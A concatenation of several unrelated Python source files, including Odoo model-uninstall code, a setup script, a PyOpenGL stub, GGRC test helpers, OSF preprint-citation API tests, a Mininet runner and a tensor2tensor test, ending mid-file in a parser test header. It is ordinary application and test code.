unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model not in ('ir.model','ir.model.fields','ir.model.constraint'))
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.constraint')
ir_module_module = self.pool['ir.module.module']
ir_model_constraint = self.pool['ir.model.constraint']
modules_to_remove_ids = ir_module_module.search(cr, uid, [('name', 'in', modules_to_remove)], context=context)
constraint_ids = ir_model_constraint.search(cr, uid, [('module', 'in', modules_to_remove_ids)], context=context)
ir_model_constraint._module_data_uninstall(cr, uid, constraint_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.fields')
ir_model_relation = self.pool['ir.model.relation']
relation_ids = ir_model_relation.search(cr, uid, [('module', 'in', modules_to_remove_ids)])
ir_model_relation._module_data_uninstall(cr, uid, relation_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model')
cr.commit()
self.unlink(cr, uid, ids, context)
def _process_end(self, cr, uid, modules):
""" Clear records removed from updated module data.
This method is called at the end of the module loading process.
It is meant to removed records that are no longer present in the
updated data. Such records are recognised as the one with an xml id
and a module in ir_model_data and noupdate set to false, but not
present in self.loads.
"""
if not modules or config.get('import_partial'):
return True
bad_imd_ids = []
context = {MODULE_UNINSTALL_FLAG: True}
cr.execute("""SELECT id,name,model,res_id,module FROM ir_model_data
WHERE module IN %s AND res_id IS NOT NULL AND noupdate=%s ORDER BY id DESC
""", (tuple(modules), False))
for (id, name, model, res_id, module) in cr.fetchall():
if (module, name) not in self.loads:
if model in self.pool:
_logger.info('Deleting %s@%s (%s.%s)', res_id, model, module, name)
if self.pool[model].exists(cr, uid, [res_id], context=context):
self.pool[model].unlink(cr, uid, [res_id], context=context)
else:
bad_imd_ids.append(id)
if bad_imd_ids:
self.unlink(cr, uid, bad_imd_ids, context=context)
self.loads.clear()
class wizard_model_menu(osv.osv_memory):
_name = 'wizard.ir.model.menu.create'
_columns = {
'menu_id': fields.many2one('ir.ui.menu', 'Parent Menu', required=True),
'name': fields.char('Menu Name', required=True),
}
def menu_create(self, cr, uid, ids, context=None):
if not context:
context = {}
model_pool = self.pool.get('ir.model')
for menu in self.browse(cr, uid, ids, context):
model = model_pool.browse(cr, uid, context.get('model_id'), context=context)
val = {
'name': menu.name,
'res_model': model.model,
'view_type': 'form',
'view_mode': 'tree,form'
}
action_id = self.pool.get('ir.actions.act_window').create(cr, uid, val)
self.pool.get('ir.ui.menu').create(cr, uid, {
'name': menu.name,
'parent_id': menu.menu_id.id,
'action': 'ir.actions.act_window,%d' % (action_id,),
'icon': 'STOCK_INDENT'
}, context)
return {'type':'ir.actions.act_window_close'}
|
from distutils.core import setup
import os
import os.path
import glob
try:
destdir = os.environ["DESTDIR"]
except KeyError:
destdir = ""
setup(
name='dxdiff',
version='1.0',
description="An XML aware diff tool.",
author = "The ICOM team",
author_email = "fraser.waters08@imperial.ac.uk",
url = "http://amcg.ese.ic.ac.uk",
packages = ['dxdiff'],
scripts=["dxdiff/dxdiff"],
)
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
from OpenGL.raw.GL import _types as _cs
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_texture_env_crossbar'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_texture_env_crossbar',error_checker=_errors._error_checker)
|
from lib import cache
from lib import exception
from lib import base
from lib import constants
from lib.page.widget import info_widget
from lib.page.widget import admin_widget
from lib.page.widget import generic_widget
def _filter_out_underscore(object_name):
"""Since class names don't allow underscore in names, we're parsing them
out"""
return object_name if "_" not in object_name \
else object_name.replace("_", "")
def _all_subclasses(cls):
"""Returns all subclassses for a parent"""
return cls.__subclasses__() + \
[g for s in cls.__subclasses__() for g in _all_subclasses(s)]
def _factory(cls_name, parent_cls, search_nested_subclasses=False):
"""Returns a subclass from parent
Args:
cls_name (basestring)
parent_cls (cls)
search_nested_subclasses (bool)
Returns:
cls
"""
subcls_name = _filter_out_underscore(cls_name.lower())
members = _all_subclasses(parent_cls) \
if search_nested_subclasses \
else parent_cls.__subclasses__()
for member_cls in members:
if member_cls.__name__.lower() == subcls_name:
break
else:
raise exception.NoClassFound(
"%s for parent %s" % (subcls_name, parent_cls))
return member_cls
def get_method_lhn_select(object_name):
"""Returns the method of LHN class
Args:
object_name (basestring)
"""
return constants.method.SELECT_PREFIX \
+ cache.LHN_SECTION_MEMBERS[object_name]
def get_method_select(object_name):
"""Returns the method of LHN class
Args:
object_name (basestring)
"""
return constants.method.SELECT_PREFIX + object_name
def get_cls_test_utils(object_name):
"""Returns a test utils class based on object name
Args:
object_name (basestring)
"""
cls_name = constants.cls_name.TEST_MODAL_NEW_PREFIX + object_name
return _factory(cls_name, base.TestUtil, search_nested_subclasses=True)
def get_cls_widget(object_name, is_info=False, is_admin=False):
"""Returns the info widget class
Args:
object_name (basestring)
"""
if is_info:
base_cls = info_widget.Widget
elif is_admin:
base_cls = admin_widget.Widget
else:
base_cls = generic_widget.Widget
return _factory(object_name, base_cls)
def get_locator_widget(widget_name):
"""Returns the locator for the widget tab in the widget bar"""
# todo: unittests
return getattr(constants.locator.WidgetBar, widget_name.upper())
def get_locator_add_widget(widget_name):
"""Returns the locator for the selected widget from the add widget button
dropdown in the widget bar"""
# todo: unittests
return getattr(
constants.locator.WidgetBarButtonAddDropdown, widget_name.upper())
|
from api.base.settings.defaults import API_BASE
from api.citations.utils import render_citation
from django.utils import timezone
from nose.tools import * # noqa:
from osf_tests.factories import AuthUserFactory, PreprintFactory
from tests.base import ApiTestCase
from osf.utils.permissions import WRITE
from osf.utils.workflows import DefaultStates
class PreprintCitationsMixin(object):
def setUp(self):
super(PreprintCitationsMixin, self).setUp()
self.admin_contributor = AuthUserFactory()
self.published_preprint = PreprintFactory(
creator=self.admin_contributor)
self.unpublished_preprint = PreprintFactory(
creator=self.admin_contributor, is_published=False)
def test_unauthenticated_can_view_published_preprint_citations(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
def test_unauthenticated_cannot_view_unpublished_preprint_citations(self):
res = self.app.get(self.unpublished_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
def test_preprint_citations_are_read_only(self):
post_res = self.app.post_json_api(
self.published_preprint_url, {},
auth=self.admin_contributor.auth,
expect_errors=True)
assert_equal(post_res.status_code, 405)
put_res = self.app.put_json_api(
self.published_preprint_url, {},
auth=self.admin_contributor.auth,
expect_errors=True)
assert_equal(put_res.status_code, 405)
delete_res = self.app.delete_json_api(
self.published_preprint_url,
auth=self.admin_contributor.auth,
expect_errors=True)
assert_equal(delete_res.status_code, 405)
class TestPreprintCitations(PreprintCitationsMixin, ApiTestCase):
def setUp(self):
super(TestPreprintCitations, self).setUp()
self.published_preprint_url = '/{}preprints/{}/citation/'.format(
API_BASE, self.published_preprint._id)
self.unpublished_preprint_url = '/{}preprints/{}/citation/'.format(
API_BASE, self.unpublished_preprint._id)
self.other_contrib = AuthUserFactory()
def test_citation_publisher_is_preprint_provider(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
assert_equal(
res.json['data']['attributes']['publisher'],
self.published_preprint.provider.name)
def test_citation_url_is_preprint_url_not_project(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
assert_equal(
res.json['data']['links']['self'],
self.published_preprint.display_absolute_url
)
class TestPreprintCitationsPermissions(PreprintCitationsMixin, ApiTestCase):
def setUp(self):
super(TestPreprintCitationsPermissions, self).setUp()
self.published_preprint_url = '/{}preprints/{}/citation/'.format(
API_BASE, self.published_preprint._id)
self.unpublished_preprint_url = '/{}preprints/{}/citation/'.format(
API_BASE, self.unpublished_preprint._id)
self.other_contrib = AuthUserFactory()
def test_unpublished_preprint_citations(self):
# Unauthenticated
res = self.app.get(self.unpublished_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.unpublished_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.unpublished_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.unpublished_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state, not because of published flag
assert_equal(res.status_code, 403)
# Admin contrib
res = self.app.get(self.unpublished_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
def test_private_preprint_citations(self):
self.published_preprint.is_public = False
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state
assert_equal(res.status_code, 200)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
def test_deleted_preprint_citations(self):
self.published_preprint.deleted = timezone.now()
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 404)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 404)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state
assert_equal(res.status_code, 404)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth, expect_errors=True)
assert_equal(res.status_code, 404)
def test_abandoned_preprint_citations(self):
self.published_preprint.machine_state = DefaultStates.INITIAL.value
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state
assert_equal(res.status_code, 403)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
class TestPreprintCitationContent(PreprintCitationsMixin, ApiTestCase):
def setUp(self):
super(TestPreprintCitationContent, self).setUp()
self.published_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.published_preprint._id)
self.unpublished_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.unpublished_preprint._id)
def test_citation_contains_correct_date(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
expected_date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_true(
expected_date in res.json['data']['attributes']['citation'])
def test_citation_no_date(self):
self.published_preprint.date_published = None
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
expected_date = 'n.d.'
assert_true(
expected_date in res.json['data']['attributes']['citation'])
class TestPreprintCitationsContentPermissions(PreprintCitationsMixin, ApiTestCase):
def setUp(self):
super(TestPreprintCitationsContentPermissions, self).setUp()
self.published_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.published_preprint._id)
self.unpublished_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.unpublished_preprint._id)
self.other_contrib = AuthUserFactory()
def test_unpublished_preprint_citations(self):
# Unauthenticated
res = self.app.get(self.unpublished_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.unpublished_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.unpublished_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.unpublished_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state, not because of published flag
assert_equal(res.status_code, 403)
# Admin contrib
res = self.app.get(self.unpublished_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
def test_private_preprint_citations(self):
self.published_preprint.is_public = False
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state
assert_equal(res.status_code, 200)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
def test_deleted_preprint_citations(self):
self.published_preprint.deleted = timezone.now()
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 404)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 404)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state
assert_equal(res.status_code, 404)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth, expect_errors=True)
assert_equal(res.status_code, 404)
def test_abandoned_preprint_citations(self):
self.published_preprint.machine_state = DefaultStates.INITIAL.value
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state
assert_equal(res.status_code, 403)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
class TestPreprintCitationContentMLA(ApiTestCase):
def setUp(self):
super(TestPreprintCitationContentMLA, self).setUp()
self.admin_contributor = AuthUserFactory()
self.published_preprint = PreprintFactory(
creator=self.admin_contributor)
self.published_preprint.title = 'My Preprint'
self.published_preprint.save()
self.admin_contributor.given_name = 'Grapes'
self.admin_contributor.middle_names = ' Coffee Beans '
self.admin_contributor.family_name = 'McGee'
self.admin_contributor.save()
self.published_preprint_url = '/{}preprints/{}/citation/modern-language-association/'.format(
API_BASE, self.published_preprint._id)
self.second_contrib = AuthUserFactory()
self.second_contrib.given_name = 'Darla'
self.second_contrib.middle_names = 'Texas Toast'
self.second_contrib.family_name = 'Jenkins'
self.second_contrib.suffix = 'Junior'
self.second_contrib.save()
self.third_contrib = AuthUserFactory()
self.third_contrib.given_name = 'Lilith'
self.third_contrib.middle_names = 'Radar'
self.third_contrib.family_name = 'Schematics'
self.third_contrib.save()
def test_not_published(self):
self.published_preprint.date_published = None
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, u'McGee, Grapes C. B. “{}.” {}, {} Web.'.format(
self.published_preprint.title,
self.published_preprint.provider.name,
'n.d.')
)
def test_one_author(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
# test_suffix
self.admin_contributor.suffix = 'Junior'
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
# test_no_middle_names
self.admin_contributor.suffix = ''
self.admin_contributor.middle_names = ''
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
def test_citation_no_repeated_periods(self):
self.published_preprint.title = 'A Study of Coffee.'
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
def test_citation_osf_provider(self):
self.published_preprint.title = 'A Study of Coffee.'
self.published_preprint.save()
self.published_preprint.provider.name = 'Open Science Framework'
self.published_preprint.provider.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
def test_two_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
def test_three_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
# first name suffix
self.admin_contributor.suffix = 'Jr.'
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation, render_citation(self.published_preprint, 'modern-language-association'))
class TestPreprintCitationContentAPA(ApiTestCase):
def setUp(self):
super(TestPreprintCitationContentAPA, self).setUp()
self.admin_contributor = AuthUserFactory()
self.published_preprint = PreprintFactory(
title='A Study of Coffee',
creator=self.admin_contributor
)
self.published_preprint.save()
self.admin_contributor.given_name = 'Grapes'
self.admin_contributor.middle_names = ' Coffee Beans '
self.admin_contributor.family_name = 'McGee'
self.admin_contributor.save()
self.second_contrib = AuthUserFactory()
self.second_contrib.given_name = 'Darla'
self.second_contrib.middle_names = 'Texas Toast'
self.second_contrib.family_name = 'Jenkins'
self.second_contrib.suffix = 'Junior'
self.second_contrib.save()
self.third_contrib = AuthUserFactory()
self.third_contrib.given_name = 'Lilith'
self.third_contrib.middle_names = 'Radar'
self.third_contrib.family_name = 'Schematics'
self.third_contrib.save()
self.published_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.published_preprint._id)
def test_not_published(self):
self.published_preprint.date_published = None
self.published_preprint.save()
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation,
u'McGee, G. C. B., & Jenkins, D. T. T., Junior. ({}). {}. {}'.format(
'n.d.',
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
def test_one_author(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
# test_suffix
self.admin_contributor.suffix = 'Junior'
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B., Junior. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
# test_no_middle_names
self.admin_contributor.suffix = ''
self.admin_contributor.middle_names = ''
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
def test_two_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B., & Jenkins, D. T. T., Junior. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
def test_three_authors_and_title_with_period(self):
self.published_preprint.title = 'This Title Ends in a Period.'
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation, u'McGee, G. C. B., Jenkins, D. T. T., Junior, & Schematics, L. R. ({}). {}. {}'.format(
date,
'This Title Ends in a Period',
'https://doi.org/' + self.published_preprint.article_doi)
)
def test_seven_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
for i in range(1, 5):
new_user = AuthUserFactory()
new_user.given_name = 'James'
new_user.family_name = 'Taylor{}'.format(i)
new_user.save()
self.published_preprint.add_contributor(new_user)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B., Jenkins, D. T. T., Junior, Schematics, L. R., Taylor1, J., Taylor2, J., Taylor3, J., & Taylor4, J. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
def test_eight_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
for i in range(1, 6):
new_user = AuthUserFactory()
new_user.given_name = 'James'
new_user.family_name = 'Taylor{}'.format(i)
new_user.save()
self.published_preprint.add_contributor(new_user)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_equal(citation,
u'McGee, G. C. B., Jenkins, D. T. T., Junior, Schematics, L. R., Taylor1, J., Taylor2, J., Taylor3, J., … Taylor5, J. ({}). {}. {}'.format(
date,
self.published_preprint.title,
'https://doi.org/' + self.published_preprint.article_doi
)
)
class TestPreprintCitationContentChicago(ApiTestCase):
def setUp(self):
super(TestPreprintCitationContentChicago, self).setUp()
self.admin_contributor = AuthUserFactory()
self.published_preprint = PreprintFactory(
title='A Study of Coffee',
creator=self.admin_contributor)
self.published_preprint.save()
self.admin_contributor.given_name = 'Grapes'
self.admin_contributor.middle_names = ' Coffee Beans '
self.admin_contributor.family_name = 'McGee'
self.admin_contributor.save()
self.published_preprint_url = '/{}preprints/{}/citation/chicago-author-date/'.format(
API_BASE, self.published_preprint._id)
self.second_contrib = AuthUserFactory()
self.second_contrib.given_name = 'Darla'
self.second_contrib.middle_names = 'Texas Toast'
self.second_contrib.family_name = 'Jenkins'
self.second_contrib.suffix = 'Junior'
self.second_contrib.save()
self.third_contrib = AuthUserFactory()
self.third_contrib.given_name = 'Lilith'
self.third_contrib.middle_names = 'Radar'
self.third_contrib.family_name = 'Schematics'
self.third_contrib.save()
def test_not_published(self):
self.published_preprint.date_published = None
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
assert_equal(citation,
u'McGee, Grapes C. B. {} “{}.” {}. {}.'.format(
'n.d.',
self.published_preprint.title,
self.published_preprint.provider.name,
'doi:' + self.published_preprint.article_doi,
)
)
def test_one_author(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes C. B. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
# test_suffix
self.admin_contributor.suffix = 'Junior'
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes C. B., Junior. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
# test_no_middle_names
self.admin_contributor.suffix = ''
self.admin_contributor.middle_names = ''
self.admin_contributor.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
def test_two_authors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes C. B., and Darla T. T. Jenkins, Junior. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
def test_three_authors_and_title_with_period(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
self.published_preprint.title = 'This Preprint ends in a Period.'
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation, u'McGee, Grapes C. B., Darla T. T. Jenkins, Junior, and Lilith R. Schematics. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
'This Preprint Ends in a Period',
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi)
)
def test_eleven_contributors(self):
self.published_preprint.add_contributor(self.second_contrib)
self.published_preprint.add_contributor(self.third_contrib)
for i in range(1, 9):
new_user = AuthUserFactory()
new_user.given_name = 'James'
new_user.family_name = 'Taylor{}'.format(i)
new_user.save()
self.published_preprint.add_contributor(new_user)
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
citation = res.json['data']['attributes']['citation']
date = self.published_preprint.date_published
assert_equal(citation,
u'McGee, Grapes C. B., Darla T. T. Jenkins, Junior, Lilith R. Schematics, James Taylor1, James Taylor2, James Taylor3, James Taylor4, et al. {}. “{}.” {}. {}. {}.'.format(
date.strftime('%Y'),
self.published_preprint.title,
self.published_preprint.provider.name,
date.strftime('%B %-d'),
'doi:' + self.published_preprint.article_doi
)
)
|
import getopt
args = '-a -b -cfoo -d bar a1 a2'.split()
optlist, args = getopt.getopt(args, 'abc:d:')
assert optlist == [('-a', ''), ('-b', ''), ('-c', 'foo'), ('-d', 'bar')]
|
"""Mininet tests for clib client library functionality.
* must be run as root
* you can run a specific test case only, by adding the class name of the test
case to the command. Eg ./clib_mininet_test.py FaucetUntaggedIPv4RouteTest
It is strongly recommended to run these tests via Docker, to ensure you have
all dependencies correctly installed. See ../docs/.
"""
from clib_mininet_test_main import test_main
import clib_mininet_tests
if __name__ == '__main__':
test_main([clib_mininet_tests.__name__])
|
"""Tests for tensor2tensor.data_generators.wikisum.utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensor2tensor.data_generators.wikisum import utils
import tensorflow as tf
pkg_dir, _ = os.path.split(__file__)
_TESTDATA = os.path.join(pkg_dir, "test_data")
def _get_testdata(filename):
with tf.gfile.Open(os.path.join(_TESTDATA, filename)) as f:
return f.read()
class UtilsTest(tf.test.TestCase):
def test_filter_paragraph(self):
for bad in tf.gfile.Glob(os.path.join(_TESTDATA, "para_bad*.txt")):
for p in _get_testdata(bad).split("\n"):
self.assertTrue(utils.filter_paragraph(p),
msg="Didn't filter %s" % p)
for good in tf.gfile.Glob(os.path.join(_TESTDATA, "para_good*.txt")):
for p in _get_testdata(good).split("\n"):
p = _get_testdata(good)
self.assertFalse(utils.filter_paragraph(p), msg="Filtered %s" % p)
if __name__ == "__main__":
tf.test.main()
|
"""
@package mi.dataset.parser.test
@file mi/dataset/parser/test/test_ctdmo_ghqr_imodem.py
@author Mark Worden
@brief Test code for a ctdmo_ghqr_imodem data parser
"""
import os
from nose.plugins.attrib import attr
from mi.core.exceptions import ConfigurationException, UnexpectedDataException
from mi.core.log import get_logger
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.driver.ctdmo_ghqr.imodem.resource import RESOURCE_PATH
from mi.dataset.parser.ctdmo_ghqr_imodem import CtdmoGhqrImodemParser, \
CtdmoGhqrImodemParticleClassKey, \
CtdmoGhqrImodemMetadataTelemeteredDataParticle, \
CtdmoGhqrImodemMetadataRecoveredDataParticle, \
CtdmoGhqrImodemInstrumentTelemeteredDataParticle, \
CtdmoGhqrImodemInstrumentRecoveredDataParticle
from mi.dataset.test.test_parser import ParserUnitTestCase
log = get_logger()
@attr('UNIT', group='mi')
class CtdmoGhqrImodemParserUnitTestCase(ParserUnitTestCase):
"""
